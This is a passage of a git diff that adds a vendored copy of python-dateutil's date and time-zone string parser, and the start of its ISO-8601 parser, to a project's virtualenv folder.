(None, None, None) + + strids = (('y', self.ystridx), + ('m', self.mstridx), + ('d', self.dstridx)) + + strids = {key: val for key, val in strids if val is not None} + if (len(self) == len(strids) > 0 or + (len(self) == 3 and len(strids) == 2)): + return self._resolve_from_stridxs(strids) + + mstridx = self.mstridx + + if len_ymd > 3: + raise ValueError("More than three YMD values") + elif len_ymd == 1 or (mstridx is not None and len_ymd == 2): + # One member, or two members with a month string + if mstridx is not None: + month = self[mstridx] + # since mstridx is 0 or 1, self[mstridx-1] always + # looks up the other element + other = self[mstridx - 1] + else: + other = self[0] + + if len_ymd > 1 or mstridx is None: + if other > 31: + year = other + else: + day = other + + elif len_ymd == 2: + # Two members with numbers + if self[0] > 31: + # 99-01 + year, month = self + elif self[1] > 31: + # 01-99 + month, year = self + elif dayfirst and self[1] <= 12: + # 13-01 + day, month = self + else: + # 01-13 + month, day = self + + elif len_ymd == 3: + # Three members + if mstridx == 0: + if self[1] > 31: + # Apr-2003-25 + month, year, day = self + else: + month, day, year = self + elif mstridx == 1: + if self[0] > 31 or (yearfirst and self[2] <= 31): + # 99-Jan-01 + year, month, day = self + else: + # 01-Jan-01 + # Give precedence to day-first, since + # two-digit years is usually hand-written. + day, month, year = self + + elif mstridx == 2: + # WTF!? + if self[1] > 31: + # 01-99-Jan + day, year, month = self + else: + # 99-01-Jan + year, day, month = self + + else: + if (self[0] > 31 or + self.ystridx == 0 or + (yearfirst and self[1] <= 12 and self[2] <= 31)): + # 99-01-01 + if dayfirst and self[2] <= 12: + year, day, month = self + else: + year, month, day = self + elif self[0] > 12 or (dayfirst and self[1] <= 12): + # 13-01-01 + day, month, year = self + else: + # 01-13-01 + month, day, year = self + + return year, month, day + + +class parser(object): + def __init__(self, info=None): + self.info = info or parserinfo() + + def parse(self, timestr, default=None, + ignoretz=False, tzinfos=None, **kwargs): + """ + Parse the date/time string into a :class:`datetime.datetime` object. + + :param timestr: + Any date/time string using the supported formats. + + :param default: + The default datetime object, if this is a datetime object and not + ``None``, elements specified in ``timestr`` replace elements in the + default object. + + :param ignoretz: + If set ``True``, time zones in parsed strings are ignored and a + naive :class:`datetime.datetime` object is returned. + + :param tzinfos: + Additional time zone names / aliases which may be present in the + string. This argument maps time zone names (and optionally offsets + from those time zones) to time zones. This parameter can be a + dictionary with timezone aliases mapping time zone names to time + zones or a function taking two parameters (``tzname`` and + ``tzoffset``) and returning a time zone. + + The timezones to which the names are mapped can be an integer + offset from UTC in seconds or a :class:`tzinfo` object. + + .. doctest:: + :options: +NORMALIZE_WHITESPACE + + >>> from dateutil.parser import parse + >>> from dateutil.tz import gettz + >>> tzinfos = {"BRST": -7200, "CST": gettz("America/Chicago")} + >>> parse("2012-01-19 17:21:00 BRST", tzinfos=tzinfos) + datetime.datetime(2012, 1, 19, 17, 21, tzinfo=tzoffset(u'BRST', -7200)) + >>> parse("2012-01-19 17:21:00 CST", tzinfos=tzinfos) + datetime.datetime(2012, 1, 19, 17, 21, + tzinfo=tzfile('/usr/share/zoneinfo/America/Chicago')) + + This parameter is ignored if ``ignoretz`` is set. + + :param \\*\\*kwargs: + Keyword arguments as passed to ``_parse()``. + + :return: + Returns a :class:`datetime.datetime` object or, if the + ``fuzzy_with_tokens`` option is ``True``, returns a tuple, the + first element being a :class:`datetime.datetime` object, the second + a tuple containing the fuzzy tokens. + + :raises ParserError: + Raised for invalid or unknown string format, if the provided + :class:`tzinfo` is not in a valid format, or if an invalid date + would be created. + + :raises TypeError: + Raised for non-string or character stream input. + + :raises OverflowError: + Raised if the parsed date exceeds the largest valid C integer on + your system. + """ + + if default is None: + default = datetime.datetime.now().replace(hour=0, minute=0, + second=0, microsecond=0) + + res, skipped_tokens = self._parse(timestr, **kwargs) + + if res is None: + raise ParserError("Unknown string format: %s", timestr) + + if len(res) == 0: + raise ParserError("String does not contain a date: %s", timestr) + + try: + ret = self._build_naive(res, default) + except ValueError as e: + six.raise_from(ParserError(str(e) + ": %s", timestr), e) + + if not ignoretz: + ret = self._build_tzaware(ret, res, tzinfos) + + if kwargs.get('fuzzy_with_tokens', False): + return ret, skipped_tokens + else: + return ret + + class _result(_resultbase): + __slots__ = ["year", "month", "day", "weekday", + "hour", "minute", "second", "microsecond", + "tzname", "tzoffset", "ampm","any_unused_tokens"] + + def _parse(self, timestr, dayfirst=None, yearfirst=None, fuzzy=False, + fuzzy_with_tokens=False): + """ + Private method which performs the heavy lifting of parsing, called from + ``parse()``, which passes on its ``kwargs`` to this function. + + :param timestr: + The string to parse. + + :param dayfirst: + Whether to interpret the first value in an ambiguous 3-integer date + (e.g. 01/05/09) as the day (``True``) or month (``False``). If + ``yearfirst`` is set to ``True``, this distinguishes between YDM + and YMD. If set to ``None``, this value is retrieved from the + current :class:`parserinfo` object (which itself defaults to + ``False``). + + :param yearfirst: + Whether to interpret the first value in an ambiguous 3-integer date + (e.g. 01/05/09) as the year. If ``True``, the first number is taken + to be the year, otherwise the last number is taken to be the year. + If this is set to ``None``, the value is retrieved from the current + :class:`parserinfo` object (which itself defaults to ``False``). + + :param fuzzy: + Whether to allow fuzzy parsing, allowing for string like "Today is + January 1, 2047 at 8:21:00AM". + + :param fuzzy_with_tokens: + If ``True``, ``fuzzy`` is automatically set to True, and the parser + will return a tuple where the first element is the parsed + :class:`datetime.datetime` datetimestamp and the second element is + a tuple containing the portions of the string which were ignored: + + .. doctest:: + + >>> from dateutil.parser import parse + >>> parse("Today is January 1, 2047 at 8:21:00AM", fuzzy_with_tokens=True) + (datetime.datetime(2047, 1, 1, 8, 21), (u'Today is ', u' ', u'at ')) + + """ + if fuzzy_with_tokens: + fuzzy = True + + info = self.info + + if dayfirst is None: + dayfirst = info.dayfirst + + if yearfirst is None: + yearfirst = info.yearfirst + + res = self._result() + l = _timelex.split(timestr) # Splits the timestr into tokens + + skipped_idxs = [] + + # year/month/day list + ymd = _ymd() + + len_l = len(l) + i = 0 + try: + while i < len_l: + + # Check if it's a number + value_repr = l[i] + try: + value = float(value_repr) + except ValueError: + value = None + + if value is not None: + # Numeric token + i = self._parse_numeric_token(l, i, info, ymd, res, fuzzy) + + # Check weekday + elif info.weekday(l[i]) is not None: + value = info.weekday(l[i]) + res.weekday = value + + # Check month name + elif info.month(l[i]) is not None: + value = info.month(l[i]) + ymd.append(value, 'M') + + if i + 1 < len_l: + if l[i + 1] in ('-', '/'): + # Jan-01[-99] + sep = l[i + 1] + ymd.append(l[i + 2]) + + if i + 3 < len_l and l[i + 3] == sep: + # Jan-01-99 + ymd.append(l[i + 4]) + i += 2 + + i += 2 + + elif (i + 4 < len_l and l[i + 1] == l[i + 3] == ' ' and + info.pertain(l[i + 2])): + # Jan of 01 + # In this case, 01 is clearly year + if l[i + 4].isdigit(): + # Convert it here to become unambiguous + value = int(l[i + 4]) + year = str(info.convertyear(value)) + ymd.append(year, 'Y') + else: + # Wrong guess + pass + # TODO: not hit in tests + i += 4 + + # Check am/pm + elif info.ampm(l[i]) is not None: + value = info.ampm(l[i]) + val_is_ampm = self._ampm_valid(res.hour, res.ampm, fuzzy) + + if val_is_ampm: + res.hour = self._adjust_ampm(res.hour, value) + res.ampm = value + + elif fuzzy: + skipped_idxs.append(i) + + # Check for a timezone name + elif self._could_be_tzname(res.hour, res.tzname, res.tzoffset, l[i]): + res.tzname = l[i] + res.tzoffset = info.tzoffset(res.tzname) + + # Check for something like GMT+3, or BRST+3. Notice + # that it doesn't mean "I am 3 hours after GMT", but + # "my time +3 is GMT". If found, we reverse the + # logic so that timezone parsing code will get it + # right. + if i + 1 < len_l and l[i + 1] in ('+', '-'): + l[i + 1] = ('+', '-')[l[i + 1] == '+'] + res.tzoffset = None + if info.utczone(res.tzname): + # With something like GMT+3, the timezone + # is *not* GMT. + res.tzname = None + + # Check for a numbered timezone + elif res.hour is not None and l[i] in ('+', '-'): + signal = (-1, 1)[l[i] == '+'] + len_li = len(l[i + 1]) + + # TODO: check that l[i + 1] is integer? + if len_li == 4: + # -0300 + hour_offset = int(l[i + 1][:2]) + min_offset = int(l[i + 1][2:]) + elif i + 2 < len_l and l[i + 2] == ':': + # -03:00 + hour_offset = int(l[i + 1]) + min_offset = int(l[i + 3]) # TODO: Check that l[i+3] is minute-like? + i += 2 + elif len_li <= 2: + # -[0]3 + hour_offset = int(l[i + 1][:2]) + min_offset = 0 + else: + raise ValueError(timestr) + + res.tzoffset = signal * (hour_offset * 3600 + min_offset * 60) + + # Look for a timezone name between parenthesis + if (i + 5 < len_l and + info.jump(l[i + 2]) and l[i + 3] == '(' and + l[i + 5] == ')' and + 3 <= len(l[i + 4]) and + self._could_be_tzname(res.hour, res.tzname, + None, l[i + 4])): + # -0300 (BRST) + res.tzname = l[i + 4] + i += 4 + + i += 1 + + # Check jumps + elif not (info.jump(l[i]) or fuzzy): + raise ValueError(timestr) + + else: + skipped_idxs.append(i) + i += 1 + + # Process year/month/day + year, month, day = ymd.resolve_ymd(yearfirst, dayfirst) + + res.century_specified = ymd.century_specified + res.year = year + res.month = month + res.day = day + + except (IndexError, ValueError): + return None, None + + if not info.validate(res): + return None, None + + if fuzzy_with_tokens: + skipped_tokens = self._recombine_skipped(l, skipped_idxs) + return res, tuple(skipped_tokens) + else: + return res, None + + def _parse_numeric_token(self, tokens, idx, info, ymd, res, fuzzy): + # Token is a number + value_repr = tokens[idx] + try: + value = self._to_decimal(value_repr) + except Exception as e: + six.raise_from(ValueError('Unknown numeric token'), e) + + len_li = len(value_repr) + + len_l = len(tokens) + + if (len(ymd) == 3 and len_li in (2, 4) and + res.hour is None and + (idx + 1 >= len_l or + (tokens[idx + 1] != ':' and + info.hms(tokens[idx + 1]) is None))): + # 19990101T23[59] + s = tokens[idx] + res.hour = int(s[:2]) + + if len_li == 4: + res.minute = int(s[2:]) + + elif len_li == 6 or (len_li > 6 and tokens[idx].find('.') == 6): + # YYMMDD or HHMMSS[.ss] + s = tokens[idx] + + if not ymd and '.' not in tokens[idx]: + ymd.append(s[:2]) + ymd.append(s[2:4]) + ymd.append(s[4:]) + else: + # 19990101T235959[.59] + + # TODO: Check if res attributes already set. + res.hour = int(s[:2]) + res.minute = int(s[2:4]) + res.second, res.microsecond = self._parsems(s[4:]) + + elif len_li in (8, 12, 14): + # YYYYMMDD + s = tokens[idx] + ymd.append(s[:4], 'Y') + ymd.append(s[4:6]) + ymd.append(s[6:8]) + + if len_li > 8: + res.hour = int(s[8:10]) + res.minute = int(s[10:12]) + + if len_li > 12: + res.second = int(s[12:]) + + elif self._find_hms_idx(idx, tokens, info, allow_jump=True) is not None: + # HH[ ]h or MM[ ]m or SS[.ss][ ]s + hms_idx = self._find_hms_idx(idx, tokens, info, allow_jump=True) + (idx, hms) = self._parse_hms(idx, tokens, info, hms_idx) + if hms is not None: + # TODO: checking that hour/minute/second are not + # already set? + self._assign_hms(res, value_repr, hms) + + elif idx + 2 < len_l and tokens[idx + 1] == ':': + # HH:MM[:SS[.ss]] + res.hour = int(value) + value = self._to_decimal(tokens[idx + 2]) # TODO: try/except for this? + (res.minute, res.second) = self._parse_min_sec(value) + + if idx + 4 < len_l and tokens[idx + 3] == ':': + res.second, res.microsecond = self._parsems(tokens[idx + 4]) + + idx += 2 + + idx += 2 + + elif idx + 1 < len_l and tokens[idx + 1] in ('-', '/', '.'): + sep = tokens[idx + 1] + ymd.append(value_repr) + + if idx + 2 < len_l and not info.jump(tokens[idx + 2]): + if tokens[idx + 2].isdigit(): + # 01-01[-01] + ymd.append(tokens[idx + 2]) + else: + # 01-Jan[-01] + value = info.month(tokens[idx + 2]) + + if value is not None: + ymd.append(value, 'M') + else: + raise ValueError() + + if idx + 3 < len_l and tokens[idx + 3] == sep: + # We have three members + value = info.month(tokens[idx + 4]) + + if value is not None: + ymd.append(value, 'M') + else: + ymd.append(tokens[idx + 4]) + idx += 2 + + idx += 1 + idx += 1 + + elif idx + 1 >= len_l or info.jump(tokens[idx + 1]): + if idx + 2 < len_l and info.ampm(tokens[idx + 2]) is not None: + # 12 am + hour = int(value) + res.hour = self._adjust_ampm(hour, info.ampm(tokens[idx + 2])) + idx += 1 + else: + # Year, month or day + ymd.append(value) + idx += 1 + + elif info.ampm(tokens[idx + 1]) is not None and (0 <= value < 24): + # 12am + hour = int(value) + res.hour = self._adjust_ampm(hour, info.ampm(tokens[idx + 1])) + idx += 1 + + elif ymd.could_be_day(value): + ymd.append(value) + + elif not fuzzy: + raise ValueError() + + return idx + + def _find_hms_idx(self, idx, tokens, info, allow_jump): + len_l = len(tokens) + + if idx+1 < len_l and info.hms(tokens[idx+1]) is not None: + # There is an "h", "m", or "s" label following this token. We take + # assign the upcoming label to the current token. + # e.g. the "12" in 12h" + hms_idx = idx + 1 + + elif (allow_jump and idx+2 < len_l and tokens[idx+1] == ' ' and + info.hms(tokens[idx+2]) is not None): + # There is a space and then an "h", "m", or "s" label. + # e.g. the "12" in "12 h" + hms_idx = idx + 2 + + elif idx > 0 and info.hms(tokens[idx-1]) is not None: + # There is a "h", "m", or "s" preceding this token. Since neither + # of the previous cases was hit, there is no label following this + # token, so we use the previous label. + # e.g. the "04" in "12h04" + hms_idx = idx-1 + + elif (1 < idx == len_l-1 and tokens[idx-1] == ' ' and + info.hms(tokens[idx-2]) is not None): + # If we are looking at the final token, we allow for a + # backward-looking check to skip over a space. + # TODO: Are we sure this is the right condition here? + hms_idx = idx - 2 + + else: + hms_idx = None + + return hms_idx + + def _assign_hms(self, res, value_repr, hms): + # See GH issue #427, fixing float rounding + value = self._to_decimal(value_repr) + + if hms == 0: + # Hour + res.hour = int(value) + if value % 1: + res.minute = int(60*(value % 1)) + + elif hms == 1: + (res.minute, res.second) = self._parse_min_sec(value) + + elif hms == 2: + (res.second, res.microsecond) = self._parsems(value_repr) + + def _could_be_tzname(self, hour, tzname, tzoffset, token): + return (hour is not None and + tzname is None and + tzoffset is None and + len(token) <= 5 and + (all(x in string.ascii_uppercase for x in token) + or token in self.info.UTCZONE)) + + def _ampm_valid(self, hour, ampm, fuzzy): + """ + For fuzzy parsing, 'a' or 'am' (both valid English words) + may erroneously trigger the AM/PM flag. Deal with that + here. + """ + val_is_ampm = True + + # If there's already an AM/PM flag, this one isn't one. + if fuzzy and ampm is not None: + val_is_ampm = False + + # If AM/PM is found and hour is not, raise a ValueError + if hour is None: + if fuzzy: + val_is_ampm = False + else: + raise ValueError('No hour specified with AM or PM flag.') + elif not 0 <= hour <= 12: + # If AM/PM is found, it's a 12 hour clock, so raise + # an error for invalid range + if fuzzy: + val_is_ampm = False + else: + raise ValueError('Invalid hour specified for 12-hour clock.') + + return val_is_ampm + + def _adjust_ampm(self, hour, ampm): + if hour < 12 and ampm == 1: + hour += 12 + elif hour == 12 and ampm == 0: + hour = 0 + return hour + + def _parse_min_sec(self, value): + # TODO: Every usage of this function sets res.second to the return + # value. Are there any cases where second will be returned as None and + # we *don't* want to set res.second = None? + minute = int(value) + second = None + + sec_remainder = value % 1 + if sec_remainder: + second = int(60 * sec_remainder) + return (minute, second) + + def _parse_hms(self, idx, tokens, info, hms_idx): + # TODO: Is this going to admit a lot of false-positives for when we + # just happen to have digits and "h", "m" or "s" characters in non-date + # text? I guess hex hashes won't have that problem, but there's plenty + # of random junk out there. + if hms_idx is None: + hms = None + new_idx = idx + elif hms_idx > idx: + hms = info.hms(tokens[hms_idx]) + new_idx = hms_idx + else: + # Looking backwards, increment one. + hms = info.hms(tokens[hms_idx]) + 1 + new_idx = idx + + return (new_idx, hms) + + # ------------------------------------------------------------------ + # Handling for individual tokens. These are kept as methods instead + # of functions for the sake of customizability via subclassing. + + def _parsems(self, value): + """Parse a I[.F] seconds value into (seconds, microseconds).""" + if "." not in value: + return int(value), 0 + else: + i, f = value.split(".") + return int(i), int(f.ljust(6, "0")[:6]) + + def _to_decimal(self, val): + try: + decimal_value = Decimal(val) + # See GH 662, edge case, infinite value should not be converted + # via `_to_decimal` + if not decimal_value.is_finite(): + raise ValueError("Converted decimal value is infinite or NaN") + except Exception as e: + msg = "Could not convert %s to decimal" % val + six.raise_from(ValueError(msg), e) + else: + return decimal_value + + # ------------------------------------------------------------------ + # Post-Parsing construction of datetime output. These are kept as + # methods instead of functions for the sake of customizability via + # subclassing. + + def _build_tzinfo(self, tzinfos, tzname, tzoffset): + if callable(tzinfos): + tzdata = tzinfos(tzname, tzoffset) + else: + tzdata = tzinfos.get(tzname) + # handle case where tzinfo is paased an options that returns None + # eg tzinfos = {'BRST' : None} + if isinstance(tzdata, datetime.tzinfo) or tzdata is None: + tzinfo = tzdata + elif isinstance(tzdata, text_type): + tzinfo = tz.tzstr(tzdata) + elif isinstance(tzdata, integer_types): + tzinfo = tz.tzoffset(tzname, tzdata) + else: + raise TypeError("Offset must be tzinfo subclass, tz string, " + "or int offset.") + return tzinfo + + def _build_tzaware(self, naive, res, tzinfos): + if (callable(tzinfos) or (tzinfos and res.tzname in tzinfos)): + tzinfo = self._build_tzinfo(tzinfos, res.tzname, res.tzoffset) + aware = naive.replace(tzinfo=tzinfo) + aware = self._assign_tzname(aware, res.tzname) + + elif res.tzname and res.tzname in time.tzname: + aware = naive.replace(tzinfo=tz.tzlocal()) + + # Handle ambiguous local datetime + aware = self._assign_tzname(aware, res.tzname) + + # This is mostly relevant for winter GMT zones parsed in the UK + if (aware.tzname() != res.tzname and + res.tzname in self.info.UTCZONE): + aware = aware.replace(tzinfo=tz.UTC) + + elif res.tzoffset == 0: + aware = naive.replace(tzinfo=tz.UTC) + + elif res.tzoffset: + aware = naive.replace(tzinfo=tz.tzoffset(res.tzname, res.tzoffset)) + + elif not res.tzname and not res.tzoffset: + # i.e. no timezone information was found. + aware = naive + + elif res.tzname: + # tz-like string was parsed but we don't know what to do + # with it + warnings.warn("tzname {tzname} identified but not understood. " + "Pass `tzinfos` argument in order to correctly " + "return a timezone-aware datetime. In a future " + "version, this will raise an " + "exception.".format(tzname=res.tzname), + category=UnknownTimezoneWarning) + aware = naive + + return aware + + def _build_naive(self, res, default): + repl = {} + for attr in ("year", "month", "day", "hour", + "minute", "second", "microsecond"): + value = getattr(res, attr) + if value is not None: + repl[attr] = value + + if 'day' not in repl: + # If the default day exceeds the last day of the month, fall back + # to the end of the month. + cyear = default.year if res.year is None else res.year + cmonth = default.month if res.month is None else res.month + cday = default.day if res.day is None else res.day + + if cday > monthrange(cyear, cmonth)[1]: + repl['day'] = monthrange(cyear, cmonth)[1] + + naive = default.replace(**repl) + + if res.weekday is not None and not res.day: + naive = naive + relativedelta.relativedelta(weekday=res.weekday) + + return naive + + def _assign_tzname(self, dt, tzname): + if dt.tzname() != tzname: + new_dt = tz.enfold(dt, fold=1) + if new_dt.tzname() == tzname: + return new_dt + + return dt + + def _recombine_skipped(self, tokens, skipped_idxs): + """ + >>> tokens = ["foo", " ", "bar", " ", "19June2000", "baz"] + >>> skipped_idxs = [0, 1, 2, 5] + >>> _recombine_skipped(tokens, skipped_idxs) + ["foo bar", "baz"] + """ + skipped_tokens = [] + for i, idx in enumerate(sorted(skipped_idxs)): + if i > 0 and idx - 1 == skipped_idxs[i - 1]: + skipped_tokens[-1] = skipped_tokens[-1] + tokens[idx] + else: + skipped_tokens.append(tokens[idx]) + + return skipped_tokens + + +DEFAULTPARSER = parser() + + +def parse(timestr, parserinfo=None, **kwargs): + """ + + Parse a string in one of the supported formats, using the + ``parserinfo`` parameters. + + :param timestr: + A string containing a date/time stamp. + + :param parserinfo: + A :class:`parserinfo` object containing parameters for the parser. + If ``None``, the default arguments to the :class:`parserinfo` + constructor are used. + + The ``**kwargs`` parameter takes the following keyword arguments: + + :param default: + The default datetime object, if this is a datetime object and not + ``None``, elements specified in ``timestr`` replace elements in the + default object. + + :param ignoretz: + If set ``True``, time zones in parsed strings are ignored and a naive + :class:`datetime` object is returned. + + :param tzinfos: + Additional time zone names / aliases which may be present in the + string. This argument maps time zone names (and optionally offsets + from those time zones) to time zones. This parameter can be a + dictionary with timezone aliases mapping time zone names to time + zones or a function taking two parameters (``tzname`` and + ``tzoffset``) and returning a time zone. + + The timezones to which the names are mapped can be an integer + offset from UTC in seconds or a :class:`tzinfo` object. + + .. doctest:: + :options: +NORMALIZE_WHITESPACE + + >>> from dateutil.parser import parse + >>> from dateutil.tz import gettz + >>> tzinfos = {"BRST": -7200, "CST": gettz("America/Chicago")} + >>> parse("2012-01-19 17:21:00 BRST", tzinfos=tzinfos) + datetime.datetime(2012, 1, 19, 17, 21, tzinfo=tzoffset(u'BRST', -7200)) + >>> parse("2012-01-19 17:21:00 CST", tzinfos=tzinfos) + datetime.datetime(2012, 1, 19, 17, 21, + tzinfo=tzfile('/usr/share/zoneinfo/America/Chicago')) + + This parameter is ignored if ``ignoretz`` is set. + + :param dayfirst: + Whether to interpret the first value in an ambiguous 3-integer date + (e.g. 01/05/09) as the day (``True``) or month (``False``). If + ``yearfirst`` is set to ``True``, this distinguishes between YDM and + YMD. If set to ``None``, this value is retrieved from the current + :class:`parserinfo` object (which itself defaults to ``False``). + + :param yearfirst: + Whether to interpret the first value in an ambiguous 3-integer date + (e.g. 01/05/09) as the year. If ``True``, the first number is taken to + be the year, otherwise the last number is taken to be the year. If + this is set to ``None``, the value is retrieved from the current + :class:`parserinfo` object (which itself defaults to ``False``). + + :param fuzzy: + Whether to allow fuzzy parsing, allowing for string like "Today is + January 1, 2047 at 8:21:00AM". + + :param fuzzy_with_tokens: + If ``True``, ``fuzzy`` is automatically set to True, and the parser + will return a tuple where the first element is the parsed + :class:`datetime.datetime` datetimestamp and the second element is + a tuple containing the portions of the string which were ignored: + + .. doctest:: + + >>> from dateutil.parser import parse + >>> parse("Today is January 1, 2047 at 8:21:00AM", fuzzy_with_tokens=True) + (datetime.datetime(2047, 1, 1, 8, 21), (u'Today is ', u' ', u'at ')) + + :return: + Returns a :class:`datetime.datetime` object or, if the + ``fuzzy_with_tokens`` option is ``True``, returns a tuple, the + first element being a :class:`datetime.datetime` object, the second + a tuple containing the fuzzy tokens. + + :raises ParserError: + Raised for invalid or unknown string formats, if the provided + :class:`tzinfo` is not in a valid format, or if an invalid date would + be created. + + :raises OverflowError: + Raised if the parsed date exceeds the largest valid C integer on + your system. + """ + if parserinfo: + return parser(parserinfo).parse(timestr, **kwargs) + else: + return DEFAULTPARSER.parse(timestr, **kwargs) + + +class _tzparser(object): + + class _result(_resultbase): + + __slots__ = ["stdabbr", "stdoffset", "dstabbr", "dstoffset", + "start", "end"] + + class _attr(_resultbase): + __slots__ = ["month", "week", "weekday", + "yday", "jyday", "day", "time"] + + def __repr__(self): + return self._repr("") + + def __init__(self): + _resultbase.__init__(self) + self.start = self._attr() + self.end = self._attr() + + def parse(self, tzstr): + res = self._result() + l = [x for x in re.split(r'([,:.]|[a-zA-Z]+|[0-9]+)',tzstr) if x] + used_idxs = list() + try: + + len_l = len(l) + + i = 0 + while i < len_l: + # BRST+3[BRDT[+2]] + j = i + while j < len_l and not [x for x in l[j] + if x in "0123456789:,-+"]: + j += 1 + if j != i: + if not res.stdabbr: + offattr = "stdoffset" + res.stdabbr = "".join(l[i:j]) + else: + offattr = "dstoffset" + res.dstabbr = "".join(l[i:j]) + + for ii in range(j): + used_idxs.append(ii) + i = j + if (i < len_l and (l[i] in ('+', '-') or l[i][0] in + "0123456789")): + if l[i] in ('+', '-'): + # Yes, that's right. See the TZ variable + # documentation. + signal = (1, -1)[l[i] == '+'] + used_idxs.append(i) + i += 1 + else: + signal = -1 + len_li = len(l[i]) + if len_li == 4: + # -0300 + setattr(res, offattr, (int(l[i][:2]) * 3600 + + int(l[i][2:]) * 60) * signal) + elif i + 1 < len_l and l[i + 1] == ':': + # -03:00 + setattr(res, offattr, + (int(l[i]) * 3600 + + int(l[i + 2]) * 60) * signal) + used_idxs.append(i) + i += 2 + elif len_li <= 2: + # -[0]3 + setattr(res, offattr, + int(l[i][:2]) * 3600 * signal) + else: + return None + used_idxs.append(i) + i += 1 + if res.dstabbr: + break + else: + break + + + if i < len_l: + for j in range(i, len_l): + if l[j] == ';': + l[j] = ',' + + assert l[i] == ',' + + i += 1 + + if i >= len_l: + pass + elif (8 <= l.count(',') <= 9 and + not [y for x in l[i:] if x != ',' + for y in x if y not in "0123456789+-"]): + # GMT0BST,3,0,30,3600,10,0,26,7200[,3600] + for x in (res.start, res.end): + x.month = int(l[i]) + used_idxs.append(i) + i += 2 + if l[i] == '-': + value = int(l[i + 1]) * -1 + used_idxs.append(i) + i += 1 + else: + value = int(l[i]) + used_idxs.append(i) + i += 2 + if value: + x.week = value + x.weekday = (int(l[i]) - 1) % 7 + else: + x.day = int(l[i]) + used_idxs.append(i) + i += 2 + x.time = int(l[i]) + used_idxs.append(i) + i += 2 + if i < len_l: + if l[i] in ('-', '+'): + signal = (-1, 1)[l[i] == "+"] + used_idxs.append(i) + i += 1 + else: + signal = 1 + used_idxs.append(i) + res.dstoffset = (res.stdoffset + int(l[i]) * signal) + + # This was a made-up format that is not in normal use + warn(('Parsed time zone "%s"' % tzstr) + + 'is in a non-standard dateutil-specific format, which ' + + 'is now deprecated; support for parsing this format ' + + 'will be removed in future versions. It is recommended ' + + 'that you switch to a standard format like the GNU ' + + 'TZ variable format.', tz.DeprecatedTzFormatWarning) + elif (l.count(',') == 2 and l[i:].count('/') <= 2 and + not [y for x in l[i:] if x not in (',', '/', 'J', 'M', + '.', '-', ':') + for y in x if y not in "0123456789"]): + for x in (res.start, res.end): + if l[i] == 'J': + # non-leap year day (1 based) + used_idxs.append(i) + i += 1 + x.jyday = int(l[i]) + elif l[i] == 'M': + # month[-.]week[-.]weekday + used_idxs.append(i) + i += 1 + x.month = int(l[i]) + used_idxs.append(i) + i += 1 + assert l[i] in ('-', '.') + used_idxs.append(i) + i += 1 + x.week = int(l[i]) + if x.week == 5: + x.week = -1 + used_idxs.append(i) + i += 1 + assert l[i] in ('-', '.') + used_idxs.append(i) + i += 1 + x.weekday = (int(l[i]) - 1) % 7 + else: + # year day (zero based) + x.yday = int(l[i]) + 1 + + used_idxs.append(i) + i += 1 + + if i < len_l and l[i] == '/': + used_idxs.append(i) + i += 1 + # start time + len_li = len(l[i]) + if len_li == 4: + # -0300 + x.time = (int(l[i][:2]) * 3600 + + int(l[i][2:]) * 60) + elif i + 1 < len_l and l[i + 1] == ':': + # -03:00 + x.time = int(l[i]) * 3600 + int(l[i + 2]) * 60 + used_idxs.append(i) + i += 2 + if i + 1 < len_l and l[i + 1] == ':': + used_idxs.append(i) + i += 2 + x.time += int(l[i]) + elif len_li <= 2: + # -[0]3 + x.time = (int(l[i][:2]) * 3600) + else: + return None + used_idxs.append(i) + i += 1 + + assert i == len_l or l[i] == ',' + + i += 1 + + assert i >= len_l + + except (IndexError, ValueError, AssertionError): + return None + + unused_idxs = set(range(len_l)).difference(used_idxs) + res.any_unused_tokens = not {l[n] for n in unused_idxs}.issubset({",",":"}) + return res + + +DEFAULTTZPARSER = _tzparser() + + +def _parsetz(tzstr): + return DEFAULTTZPARSER.parse(tzstr) + + +class ParserError(ValueError): + """Exception subclass used for any failure to parse a datetime string. + + This is a subclass of :py:exc:`ValueError`, and should be raised any time + earlier versions of ``dateutil`` would have raised ``ValueError``. + + .. versionadded:: 2.8.1 + """ + def __str__(self): + try: + return self.args[0] % self.args[1:] + except (TypeError, IndexError): + return super(ParserError, self).__str__() + + def __repr__(self): + args = ", ".join("'%s'" % arg for arg in self.args) + return "%s(%s)" % (self.__class__.__name__, args) + + +class UnknownTimezoneWarning(RuntimeWarning): + """Raised when the parser finds a timezone it cannot parse into a tzinfo. + + .. versionadded:: 2.7.0 + """ +# vim:ts=4:sw=4:et diff --git a/env/Lib/site-packages/dateutil/parser/isoparser.py b/env/Lib/site-packages/dateutil/parser/isoparser.py new file mode 100644 index 00000000..5d7bee38 --- /dev/null +++ b/env/Lib/site-packages/dateutil/parser/isoparser.py @@ -0,0 +1,416 @@ +# -*- coding: utf-8 -*- +""" +This module offers a parser for ISO-8601 strings + +It is intended to support all valid date, time and datetime formats per the +ISO-8601 specification. + +..versionadded:: 2.7.0 +""" +from datetime import datetime, timedelta, time, date +import calendar +from dateutil import tz + +from functools import wraps + +import re +import six + +__all__ = ["isoparse", "isoparser"] + + +def _takes_ascii(f): + @wraps(f) + def func(self, str_in, *args, **kwargs): + # If it's a stream, read the whole thing + str_in = getattr(str_in, 'read', lambda: str_in)() + + # If it's unicode, turn it into bytes, since ISO-8601 only covers ASCII + if isinstance(str_in, six.text_type): + # ASCII is the same in UTF-8 + try: + str_in = str_in.encode('ascii') + except UnicodeEncodeError as e: + msg = 'ISO-8601 strings should contain only ASCII characters' + six.raise_from(ValueError(msg), e) + + return f(self, str_in, *args, **kwargs) + + return func + + +class isoparser(object): + def __init__(self, sep=None): + """ + :param sep: + A single character that separates date and time portions. If + ``None``, the parser will accept any single character. + For strict ISO-8601 adherence, pass ``'T'``. + """ + if sep is not None: + if (len(sep) != 1 or ord(sep) >= 128 or sep in '0123456789'): + raise ValueError('Separator must be a single, non-numeric ' + + 'ASCII character') + + sep = sep.encode('ascii') + + self._sep = sep + + @_takes_ascii + def isoparse(self, dt_str): + """ + Parse an ISO-8601 datetime string into a :class:`datetime.datetime`. + + An ISO-8601 datetime string consists of a date portion, followed + optionally by a time portion - the date and time portions are separated + by a single character separator, which is ``T`` in the official + standard. Incomplete date formats (such as ``YYYY-MM``) may *not* be + combined with a time portion. + + Supported date formats are: + + Common: + + - ``YYYY`` + - ``YYYY-MM`` or ``YYYYMM`` + - ``YYYY-MM-DD`` or ``YYYYMMDD`` + + Uncommon: + + - ``YYYY-Www`` or ``YYYYWww`` - ISO week (day defaults to 0) + - ``YYYY-Www-D`` or ``YYYYWwwD`` - ISO week and day + + The ISO week and day numbering follows the same logic as + :func:`datetime.date.isocalendar`. + + Supported time formats are: + + - ``hh`` + 